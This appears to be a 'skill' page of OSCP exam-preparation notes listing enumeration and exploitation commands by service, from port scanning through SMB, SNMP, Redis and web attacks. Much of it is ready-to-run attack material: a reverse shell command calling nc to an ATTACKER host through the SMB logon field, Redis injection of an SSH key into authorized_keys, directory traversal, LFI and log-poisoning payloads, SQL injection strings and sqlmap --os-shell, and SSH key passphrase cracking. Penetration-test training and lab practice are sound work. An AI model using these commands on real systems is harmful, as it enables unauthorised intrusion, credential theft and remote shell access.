Skills

OSCP Notes

Installation
SKILL.md

OSCP Notes

Purpose

Provide detailed service enumeration and exploitation techniques for OSCP exam preparation. Cover protocol-specific attacks, common vulnerabilities, and proven exploitation methods for each major service.

Inputs/Prerequisites

  • Kali Linux or penetration testing distribution
  • Target IP addresses and network access
  • Nmap, Metasploit, and standard pentest tools
  • Understanding of network protocols

Outputs/Deliverables

  • Service enumeration results
  • Identified vulnerabilities
  • Working exploits and shell access
  • Captured credentials
  • Documented attack methodology

Core Workflow

1. Port Scanning

# Comprehensive Nmap scan
nmap -sC -sV -o nmap -A -T5 10.10.10.x

# Host discovery
nmap -sn 10.10.1.1-254 -vv -oA hosts
netdiscover -r 10.10.10.0/24

# DNS server discovery
nmap -p 53 10.10.10.1-254 -vv -oA dcs

# NSE vulnerability scripts
nmap -sV --script=vulscan/vulscan.nse TARGET

# List available scripts
ls /usr/share/nmap/scripts/ssh*
ls /usr/share/nmap/scripts/smb*

# Full port scan
masscan -p1-65535,U:1-65535 --rate=1000 10.10.10.x -e tun0 > ports
ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | uniq | tr '\n' ',')
nmap -Pn -sV -sC -p$ports 10.10.10.x

2. FTP Enumeration (Port 21)

# Check anonymous access
ftp TARGET
# Username: anonymous
# Password: anonymous

# Upload files if writable
ftp> put shell.php

# Common FTP exploits:
# - vsftpd 2.3.4 Backdoor
# - ProFTPD 1.3.5 mod_copy

# Nmap scripts
nmap --script ftp-anon TARGET
nmap --script ftp-vsftpd-backdoor TARGET

3. SSH Enumeration (Port 22)

# Key-based authentication
# id_rsa.pub: Public key for authorized_keys
# id_rsa: Private key for login

# Login with private key
ssh -i id_rsa user@TARGET

# Crack key passphrase
ssh2john id_rsa > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt

# Passwordless login setup
# Add id_rsa.pub to target's ~/.ssh/authorized_keys

# Banner grabbing
ssh -v TARGET
nmap -p 22 --script ssh-hostkey TARGET

4. DNS Enumeration (Port 53)

# Add host to /etc/hosts first
echo "10.10.10.135 target.htb" >> /etc/hosts

# Zone transfer
dig axfr target.htb @10.10.10.135
dnsrecon -d target.htb -t axfr

# Subdomain brute force
dnsrecon -d target.htb -t brt -D /usr/share/wordlists/subdomains.txt

# Reverse lookup
dnsrecon -r 10.10.10.0/24 -n 10.10.10.135

5. RPC Enumeration (Port 111/135)

# RPC Bind (111)
rpcclient --user="" --command=enumprivs -N TARGET
rpcinfo -p TARGET
rpcbind -p TARGET

# MS RPC (135)
rpcdump.py TARGET -p 135
rpcdump.py TARGET -p 135 | grep ncacn_np  # Get pipe names
rpcmap.py ncacn_ip_tcp:TARGET[135]

6. SMB Enumeration (Port 139/445)

# Protocol detection
nmap --script smb-protocols TARGET

# List shares
smbclient -L //TARGET
smbclient -L //TARGET -N  # Null session
smbclient --no-pass -L TARGET

# Connect to share
smbclient //TARGET/share_name
smbclient -U "username%password" //TARGET/sharename

# SMB Map enumeration
smbmap -H TARGET
smbmap -H TARGET -u '' -p ''
smbmap -H TARGET -s share_name

# CrackMapExec
crackmapexec smb TARGET -u '' -p '' --shares
crackmapexec smb TARGET -u 'user' -p 'pass' --shares

# Enum4Linux comprehensive
enum4linux -a TARGET

# RPC client enumeration
rpcclient -U "" TARGET
rpcclient> enumdomusers
rpcclient> enumdomgroups
rpcclient> queryuser [rid]
rpcclient> getdompwinfo

# Brute force
ncrack -u username -P rockyou.txt -T 5 TARGET -p smb -v

# Mount share
mount -t cifs "//TARGET/share/" /mnt/smb
mount -t cifs "//TARGET/share/" /mnt/smb -o vers=1.0,user=root,uid=0,gid=0

# SMB to reverse shell
smbclient -U "username%password" //TARGET/sharename
smb> logon "/=nc ATTACKER 4444 -e /bin/bash"

SMB Exploits:

Vulnerability Versions Exploit
Samba usermap script (CVE-2007-2447) 3.0.20-3.0.25rc3 RCE via username
EternalBlue (CVE-2017-0144) Windows Vista-10, Server 2008-2016 MS17-010
SambaCry (CVE-2017-7494) Samba < 4.5.9 Writable share RCE

7. SNMP Enumeration (Port 161)

# Basic enumeration
snmpwalk -c public -v1 TARGET
snmpcheck -t TARGET -c public
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt TARGET

# Nmap scan
nmap -sU -p 161 TARGET

# SNMP enum
snmpenum -t TARGET

# MIB values
snmpwalk -c public -v1 TARGET 1.3.6.1.2.1.25.4.2.1.2  # Running processes
snmpwalk -c public -v1 TARGET 1.3.6.1.2.1.25.6.3.1.2  # Installed software
snmpwalk -c public -v1 TARGET 1.3.6.1.4.1.77.1.2.25   # User accounts

8. IRC Enumeration (Port 194/6667)

# Nmap scripts
nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,6660-7000 TARGET

# UnrealIRCd 3.2.8.1 Backdoor exploit available

9. NFS Enumeration (Port 2049)

# Show exports
showmount -e TARGET

# Mount share
mkdir /mnt/nfs
mount -t nfs TARGET:/share /mnt/nfs

# Permission issues
# If permission denied, may need to create user with matching UID

10. MySQL Enumeration (Port 3306)

# Nmap scripts
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 TARGET

# Connect to database
mysql -h TARGET -u root -p

# Basic queries
SHOW databases;
USE database;
SHOW tables;
SELECT * FROM users;

11. Redis Enumeration (Port 6379)

# Connect to Redis
redis-cli -h TARGET

# Get configuration
CONFIG GET *

# SSH key injection (if writable)
# Write to /var/lib/redis/.ssh/ or /home/redis/.ssh/

# Generate SSH key
ssh-keygen -t rsa -f redis_key

# Upload key
redis-cli -h TARGET
CONFIG SET dir /var/lib/redis/.ssh/
CONFIG SET dbfilename "authorized_keys"
SET ssh_key "\n\nssh-rsa AAAA...\n\n"
SAVE

12. Web Application Attacks

Directory Traversal:

# Linux
../../../etc/passwd
....//....//....//etc/passwd
..%252f..%252f..%252fetc/passwd

# Windows
..\..\..\windows\system32\drivers\etc\hosts
..%5c..%5c..%5cwindows\system32\config\sam

Local File Inclusion:

# Read files
page=../../../etc/passwd

# PHP filter (read source)
page=php://filter/convert.base64-encode/resource=index.php

# Log poisoning
# Inject PHP into User-Agent, then include access log
page=/var/log/apache2/access.log

SQL Injection:

# Basic tests
' OR 1=1--
" OR 1=1--
' UNION SELECT NULL--

# SQLMap
sqlmap -u "http://TARGET/page.php?id=1" --dbs
sqlmap -u "http://TARGET/page.php?id=1" -D database -T users --dump
sqlmap -u "http://TARGET/page.php?id=1" --os-shell

Quick Reference

Important File Locations

Linux:

/etc/passwd
/etc/shadow
/etc/hosts
/home/user/.ssh/id_rsa
/var/log/auth.log

Windows:

C:\Windows\System32\config\SAM
C:\Windows\System32\drivers\etc\hosts
C:\Users\Administrator\NTUser.dat
C:\inetpub\wwwroot\web.config

Common Ports Quick Reference

Port Service First Actions
21 FTP Check anonymous, upload
22 SSH Key auth, brute force
25 SMTP User enum, relay
53 DNS Zone transfer
80/443 HTTP/S Dir enum, vulns
139/445 SMB Share enum, exploits
161 SNMP Community brute
3306 MySQL Default creds

Constraints

  • Exploits are version-specific
  • Some services require credentials
  • Firewalls may block enumeration
  • Rate limiting may affect scanning

Examples

Example 1: Quick SMB Check

smbclient -L //TARGET -N && enum4linux -a TARGET

Example 2: Full Service Enum

nmap -sV -sC -p- TARGET -oA full_scan

Troubleshooting

Issue Solution
Connection refused Check if service is running
Access denied Try null session or default creds
Timeout Reduce scan speed, check firewall
No results Try different enumeration technique
Related skills

More from zebbern/secops-cli-guides

Installs
Repository
zebbern/secops-…i-guides
GitHub Stars
30
First Seen